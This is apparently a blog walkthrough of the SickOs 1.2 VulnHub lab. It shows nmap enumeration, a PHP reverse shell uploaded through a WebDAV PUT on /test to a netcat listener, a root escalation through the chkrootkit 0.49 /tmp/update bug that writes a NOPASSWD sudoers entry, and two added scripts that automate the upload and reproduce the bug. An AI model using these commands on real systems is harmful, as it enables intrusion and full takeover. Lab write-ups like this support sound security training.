Setup

Attacker (Kali): 192.168.146.128

VulnHub link: https://www.vulnhub.com/entry/sickos-12,144/

VM network: NAT

Enumeration

Host Enumeration

Use arp-scan to find the VM's IP address on the local segment: sudo arp-scan -l

The box's IP: 192.168.146.135

Port Enumeration

Do a quick port sweep with rustscan: rustscan -a 192.168.146.135

Then run a full TCP port scan with service and OS detection in the background (it takes a while; -Pn skips host discovery since the box filters most ports): sudo nmap -T4 -A -p- -Pn 192.168.146.135 -oN nmap.txt

└─$ sudo nmap -T4 -A -p- -Pn 192.168.146.135 -oN nmap.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 16:34 CST
Nmap scan report for 192.168.146.135
Host is up (0.00082s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 668cc0f2857c6cc0f6ab7d480481c2d4 (DSA)
|   2048 ba86f5eecc83dfa63ffdc134bb7e62ab (RSA)
|_  256 a16cfa18da571d332c52e4ec97e29eaf (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:60:B3:F0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.82 ms 192.168.146.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.45 seconds

According to the result there are two open ports, SSH (OpenSSH 5.9p1) and HTTP, and the HTTP service is lighttpd 1.4.28.

HTTP Enumeration

Check the website in the browser: http://192.168.146.135

The landing page gives nothing useful:

Use gobuster to brute-force directories: gobuster dir -u http://192.168.146.135 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

nmap's http-enum script can do the same: nmap -p 80 192.168.146.135 --script http-enum

└─$ nmap -p 80 192.168.146.135 --script http-enum
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:19 CST
Nmap scan report for 192.168.146.135
Host is up (0.00079s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|_  /test/: Test page

Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds

Finally, I got a /test entry, which served a default lighttpd page with nothing else on it:

Foothold

Exploiting file upload via PUT request

nmap can go one step further and ask which HTTP methods the path accepts (the http-methods script sends an OPTIONS request and reads the Allow header): nmap -p 80 192.168.146.135 --script http-methods --script-args http-methods.url-path='/test'

└─$ nmap -p 80 192.168.146.135 --script http-methods --script-args http-methods.url-path='/test'
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:22 CST
Nmap scan report for 192.168.146.135
Host is up (0.00076s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-methods: 
|   Supported Methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK GET HEAD POST OPTIONS
|   Potentially risky methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK
|_  Path tested: /test

Nmap done: 1 IP address (1 host up) scanned in 16.43 seconds

According to the result, PUT (along with the other WebDAV methods) is enabled on /test. That means I can write arbitrary files into the web root, and since the server runs PHP, a PHP reverse shell is the obvious candidate.

Use the php-reverse-shell.php that ships with Kali: cp /usr/share/webshells/php/php-reverse-shell.php ./

Change $ip and $port to the attacker's IP and listening port:

Upload the shell with curl: curl -T php-reverse-shell.php http://192.168.146.135/test/reverse.php --http1.0

The --http1.0 flag matters: curl's default HTTP/1.1 PUT sends an Expect: 100-continue header, which lighttpd 1.4.28 answers with 417 Expectation Failed instead of accepting the body. HTTP/1.0 has no Expect header (passing -H 'Expect:' works too).

Start netcat listening first (nc -lnvp 443), then request http://192.168.146.135/test/reverse.php in the browser to trigger the payload. Then I got the shell:

I tried ports 1234 and 4444 and they didn't work. Finally, I found it worked on port 443.
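As an added example (not code from the original post), here is a small POSIX shell script that does the probe-and-upload procedure above end to end: it reads the Allow header from an OPTIONS request, flags the content-modifying methods nmap labels "potentially risky", uploads with PUT over HTTP/1.0 for the lighttpd reason just described, and confirms the upload with HEAD rather than GET so a PHP payload does not fire before the listener is ready. TARGET_URL, LOCAL_FILE and REMOTE_NAME are assumed environment variables, and the Allow header used to illustrate the parser is the one from the nmap output above.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumes curl is installed
# and that TARGET_URL (e.g. http://192.168.146.135/test/) is set by the caller.

# The methods nmap's http-methods script flags as "potentially risky".
RISKY="PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK"

# risky_methods "<Allow header value>" -> the risky ones, space separated.
risky_methods() {
    out=
    for m in $(printf '%s' "$1" | tr ',' ' '); do
        for r in $RISKY; do
            [ "$m" = "$r" ] && out="$out $m"
        done
    done
    printf '%s\n' "${out# }"
}

# has_method "<Allow header value>" METHOD -> exit 0 if METHOD is listed.
has_method() {
    for m in $(printf '%s' "$1" | tr ',' ' '); do
        [ "$m" = "$2" ] && return 0
    done
    return 1
}

# Ask the server which methods the path accepts (what nmap does as well).
fetch_allow() {
    curl -s -i --http1.0 -X OPTIONS "$1" |
        awk 'tolower($1) == "allow:" { sub(/^[^:]*:[ \t]*/, ""); sub(/\r$/, ""); print; exit }'
}

# Upload over HTTP/1.0: curl's HTTP/1.1 PUT adds "Expect: 100-continue",
# which lighttpd 1.4.28 rejects with 417. Prints the HTTP status code.
put_file() {
    curl -s -o /dev/null -w '%{http_code}' --http1.0 -T "$1" "$2"
}

# Confirm the file is served, using HEAD so a PHP payload does not run yet.
head_status() {
    curl -s -o /dev/null -w '%{http_code}' --http1.0 -I "$1"
}

main() {
    allow=$(fetch_allow "$TARGET_URL")
    echo "Allow: $allow"
    echo "Risky: $(risky_methods "$allow")"
    has_method "$allow" PUT || { echo "PUT not allowed on $TARGET_URL"; exit 1; }
    code=$(put_file "$LOCAL_FILE" "$TARGET_URL$REMOTE_NAME")
    echo "PUT  -> $code"      # 201 Created, or 204 when overwriting (RFC 4918)
    echo "HEAD -> $(head_status "$TARGET_URL$REMOTE_NAME")"
    # Start `nc -lnvp 443` first, then GET the file to trigger the shell:
    #   curl -s --http1.0 "$TARGET_URL$REMOTE_NAME" >/dev/null &
}

# Only talk to a target when one is explicitly configured.
if [ -n "${TARGET_URL:-}" ]; then
    LOCAL_FILE="${LOCAL_FILE:-php-reverse-shell.php}"
    REMOTE_NAME="${REMOTE_NAME:-reverse.php}"
    main
fi
```

Run it as TARGET_URL=http://192.168.146.135/test/ sh put_probe.sh with the listener already up; the parsing functions can be exercised without a target by sourcing the file.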

Privilege Escalation

Upgrade to an interactive TTY with python: python -c 'import pty; pty.spawn("/bin/bash")'

Then I did the usual quick checks (the /tmp and /opt directories, the process list, and so on), but unfortunately found nothing useful.

Then I used linpeas.sh to help me out: https://github.com/carlospolop/PEASS-ng/releases

Upload it with the same PUT primitive: curl -T linpeas.sh http://192.168.146.135/test/linpeas.sh --http1.0

chmod linpeas.sh and run it from the web root:

cd /var/www/test/
chmod +x linpeas.sh
./linpeas.sh

After a while I got the result and noticed a daily cron job that runs chkrootkit. That might be what I'm looking for.

Run it with -V to find the version (chkrootkit 0.49):

Use searchsploit to check whether there are known vulnerabilities for this version:

The key detail is in 33899.txt (chkrootkit 0.49 local privilege escalation):

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

The next step was simple: create /tmp/update with the command below. It makes /etc/sudoers temporarily writable, appends a NOPASSWD rule for www-data, and restores the 440 mode that sudo insists on:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Remember to chmod +x /tmp/update; chkrootkit executes the file directly, so it must be executable (without a shebang, sh falls back to running it as a shell script).

Wait a few seconds, then just run sudo su to gain root access:
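Why a file called /tmp/update gets run as root: in chkrootkit 0.49 the slapper() test lists ${ROOTDIR}tmp/update in SLAPPER_FILES and then executes the unquoted line file_port=$file_port $i. While file_port is still empty, sh parses that as "run $i with file_port= in its environment", so every existing file in the list is executed with chkrootkit's privileges. The following added example (not code from the post or from chkrootkit; only the relevant lines of slapper() are mimicked) reproduces the construct under a scratch directory beside the quoted fix, planting an update file that merely records who ran it in place of the sudoers payload. The scratch paths are constructed by mktemp and nothing under the real /tmp is touched.

```shell
#!/bin/sh
# Added example, not code from the original post or from chkrootkit.
# Reproduces the chkrootkit 0.49 slapper() bug against a scratch root.

# Buggy construct, as in chkrootkit 0.49 (only the relevant lines).
vulnerable_slapper() {
    ROOTDIR="$1/"
    SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/update"
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f "${i}" ]; then
            file_port=$file_port $i    # BUG: runs $i (as root under cron)
        fi
    done
}

# Quoted assignment: the filename is recorded, never executed.
fixed_slapper() {
    ROOTDIR="$1/"
    SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/update"
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f "${i}" ]; then
            file_port="$file_port $i"
        fi
    done
    printf '%s\n' "${file_port# }"
}

# Plant an executable "update" under <scratch>/tmp that records who ran it.
# This stands in for the walkthrough's sudoers payload.
plant_update() {
    scratch="$1"
    mkdir -p "$scratch/tmp"
    cat > "$scratch/tmp/update" <<EOF
#!/bin/sh
echo ran-as-\$(id -un) > "$scratch/marker"
EOF
    chmod +x "$scratch/tmp/update"
}

# Run the given scan function against a fresh scratch root and print the
# marker contents (nothing if the planted file was never executed).
probe() {
    scratch=$(mktemp -d)
    plant_update "$scratch"
    "$1" "$scratch" >/dev/null
    if [ -f "$scratch/marker" ]; then cat "$scratch/marker"; fi
    rm -rf "$scratch"
}

probe vulnerable_slapper   # prints ran-as-<current user>
probe fixed_slapper        # prints nothing
```

Run under the cron job's uid 0 the same construct gives the root execution the exploit text describes; the planted file runs with whatever privileges the scanning shell has, which is why the payload on this box lands as root.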

Proof

cd to /root to collect the proof:

Key Learnings From this BOX

If I had only run a directory brute-forcing tool like gobuster, I would have found the /test directory but, without checking the HTTP methods, would have missed that I could upload a reverse shell.

  • Check the http methods
  • chkrootkit 0.49 - Local Privilege Escalation
  • /etc/sudoers format to add entry: www-data ALL=(ALL)NOPASSWD:ALL
Author: z0sen
Copyright: unless otherwise stated, all articles on this site are licensed under CC BY-NC-SA 4.0. Please credit z0sen's Blog when reposting.
Tags: Walkthrough, Linux, VulnHub